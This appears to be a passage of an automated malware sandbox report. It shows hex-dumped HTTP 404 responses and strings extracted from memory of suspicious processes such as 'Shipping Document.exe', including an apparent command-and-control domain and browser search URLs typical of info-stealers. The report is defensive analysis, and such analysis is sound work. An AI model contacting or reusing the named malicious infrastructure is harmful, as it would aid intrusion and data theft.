4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:40:48 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:40:51 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:40:56 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:40:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:41:01 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:41:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:42:16 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:42:18 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:42:21 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:42:24 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: Shipping Document.exe, 00000000.00000002.1268642762.0000000002701000.00000004.00000800.00020000.00000000.sdmp, KOENBvWt.exe, 0000000C.00000002.1371331609.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, KOENBvWt.exe, 0000000C.00000002.1371331609.000000000304A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: KOENBvWt.exe, 0000000C.00000002.1371331609.000000000304A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CRUDDataSet.xsd
                Source: KOENBvWt.exe, 0000000C.00000002.1371331609.000000000304A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CRUDDataSet1.xsd
                Source: Shipping Document.exe, 00000000.00000002.1268642762.0000000002701000.00000004.00000800.00020000.00000000.sdmp, KOENBvWt.exe, 0000000C.00000002.1371331609.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CRUDDataSet1.xsd?0ZM
                Source: Shipping Document.exe, 00000000.00000002.1268642762.0000000002701000.00000004.00000800.00020000.00000000.sdmp, KOENBvWt.exe, 0000000C.00000002.1371331609.000000000304A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CRUDDataSet1.xsdIData
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3704953659.0000000005D39000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rbopisalive.cyou
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3704953659.0000000005D39000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.rbopisalive.cyou/6m32/
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3702891578.000000000429C000.00000004.80000000.00040000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702794231.0000000004B3C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: xcopy.exe, 00000016.00000002.3705262966.0000000008648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
